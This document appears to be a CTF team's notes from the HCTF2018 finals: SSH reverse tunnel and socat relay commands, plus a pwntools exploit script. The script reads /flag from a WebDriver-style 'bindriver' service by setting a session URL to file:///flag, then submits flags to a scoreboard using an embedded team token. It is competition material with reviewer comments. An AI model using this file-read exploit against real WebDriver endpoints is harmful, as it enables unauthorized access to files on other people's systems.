HCTF2018_Finals

prepare

Router:

set the route && make the outer network reachable:
# Show the current routing table before changing anything.
PS C:\WINDOWS\system32> route print
# Send the whole 192.168.0.0/16 range through the 192.168.17.1 gateway
# (route add <destination> mask <netmask> <gateway>).  Without -p the
# entry is not persistent and disappears at the next reboot.
PS C:\WINDOWS\system32> route add 192.168.0.0 mask 255.255.0.0 192.168.17.1
#windows:teamviewer

Something for pwn:

for localhost:
# localhost:6666 <---> remote:8888 by ssh tunnel
# -R: reverse forward -- connections arriving at port 8888 on the gamebox are
# delivered to our local port 6666.  Without GatewayPorts on the gamebox the
# 8888 listener is bound to loopback only, which is why the remote side
# connects to localhost:8888.
# -C compress, -q quiet, -T no tty, -f background, -n no stdin, -N no remote command.
ssh -CqTfnN -R 8888:localhost:6666 ctf@192.168.100.100
# localhost:6666 <---> remoteaddr:remote_port (another box, or a local fake pwn service)
# socat listens on 6666 and forwards every accepted connection to
# 192.168.125.125:10001; ",fork" spawns one child per client so several
# gamebox connections can be relayed at once.
socat tcp-listen:6666,fork tcp:192.168.125.125:10001

for remote:
binary:
#!/bin/bash

# socat lives under /tmp/socat, presumably together with its shared
# libraries, hence the LD_LIBRARY_PATH extension -- confirm on the box.
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/tmp/socat
# "-" is stdio: whatever the gamebox feeds this binary on stdin is relayed
# to localhost:8888 (the ssh reverse tunnel) and the answer is written to
# stdout, so the binary is a transparent proxy from the gamebox's view.
/tmp/socat/socat - tcp-connect:localhost:8888

for result:
GameBox Stdin <---> GameBox:8888 <---> localhost:6666 <---> remoteaddr:remote_port

Something wrong with run.sh:

#!/bin/sh
# NOTE(review): what "-p" limits depends on which shell /bin/sh resolves to:
# in dash it is the maximum number of user processes, in bash it is the pipe
# buffer size (which Linux does not let you change), so this line is either
# a process cap or a no-op/error.  TODO confirm the shell on the box.
ulimit -p 30
# Hard wall-clock cap: the challenge binary is killed after 120 s.
/usr/bin/timeout 120 /chall/bindriver/bindriver

pwn1

import requests
import json
import time, hashlib
import re
from pwn import *

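def submit_flag(flag, timeout=10):
    """POST *flag* to the scoreboard's team-submit endpoint and echo the reply.

    Args:
        flag: the flag text as returned by get_flag().
        timeout: seconds to wait for the scoreboard (connect and read)
            before giving up.  The original call had no timeout, so a
            stalled scoreboard would block the whole submission sweep.

    Raises:
        requests.RequestException: on connection failure or timeout; the
            caller does not catch it, matching the original behaviour.
    """
    # The team token is a credential embedded in the URL path; it belongs in
    # the environment or a config file rather than in source control.
    token = "61c3c716165073254315e347a895fb279514e0cb"
    url = "http://192.168.200.150:8005/api/team/submit/" + token
    headers = {
        "Content-Type": "application/json"
    }
    body = json.dumps({"flag": flag})
    print(body)
    reply = requests.post(url, data=body, headers=headers, timeout=timeout)
    print(reply.text)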

def get_flag(port):
    """Read the flag from the bindriver service listening on *port* of 192.168.100.100.

    Talks the service's HTTP-like dialect over a raw pwntools socket.  The
    endpoint names (/status, /session, /session/<id>/url, /session/<id>/source
    and the "sessionId" key) match the WebDriver protocol.  The sequence is:
    poll /status, open a session, point the session's url at file:///flag
    and read the session's source back.

    Returns the raw text following `source": "` up to and including the
    next "}" (recvuntil keeps the delimiter), or None if anything raises.

    Defender's note: the exploit relies on the /url endpoint accepting a
    file:// scheme; validating the scheme server-side would close this path.
    """
    try:
        #context.log_level='debug'
        #p=process("./bindriver")
        p=remote("192.168.100.100",port)
        #p.sendline("POST / HTTP/1.1\nHost: 192.168.100.100")
        #gdb.attach(p)
        # Every request is a bare request line, a lone " " line, then
        # headers -- no HTTP version.  Each reply is consumed up to its
        # closing "}\n" so the next response starts clean.
        p.sendline("GET /status\n \nConnection: Keep-Alive\nHost: localhost")
        #gdb.attach(p)
        p.recvuntil("}\n")
        p.sendline("POST /session\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("\"sessionId\": \"")
        # recv(8) returns up to 8 bytes; the session id is assumed to be
        # exactly 8 characters -- a longer id would leave junk in the stream
        # and derail the recvuntil calls below.
        session=p.recv(8)
        print session
        p.recvuntil("}\n")
        # JSON body sets the session url to file:///flag (plus a trailing
        # "#http://" fragment); send(), not sendline(), so no newline
        # terminates the body.
        p.send("POST /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost\n{\"url\": \"file:///flag#http://\"}")
        p.recvuntil("}\n")
        p.sendline("GET /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("}\n")
        p.sendline("GET /session/"+session+"/source\n \nConnection: Keep-Alive\nHost: localhost")
        p.recvuntil("source\": \"")
        # Flag is returned verbatim with the closing quote/brace still
        # attached; nothing here strips or validates it.
        flag=p.recvuntil("}")
        print flag
        # Note: p is never closed, so each call leaks a socket until the
        # tube is garbage-collected.
        return flag
    except:
        # Bare except also swallows KeyboardInterrupt and SystemExit, so a
        # Ctrl-C during a hung recv only advances to the next port.
        return None

def main():
    """Sweep ports 20101..20111 once and submit every flag that comes back.

    get_flag() reports failure as None, which is simply skipped.
    """
    ports = [20100 + offset for offset in range(1, 12)]
    for port in ports:
        flag = get_flag(port)
        if flag is not None:
            submit_flag(flag)

if __name__ == "__main__":
    # Single one-shot sweep.  The commented-out lines are the author's
    # polling variant (re-run every 5 s with a separator line).
    # while 1:
    main()
    # time.sleep(5)
    # print "-"*20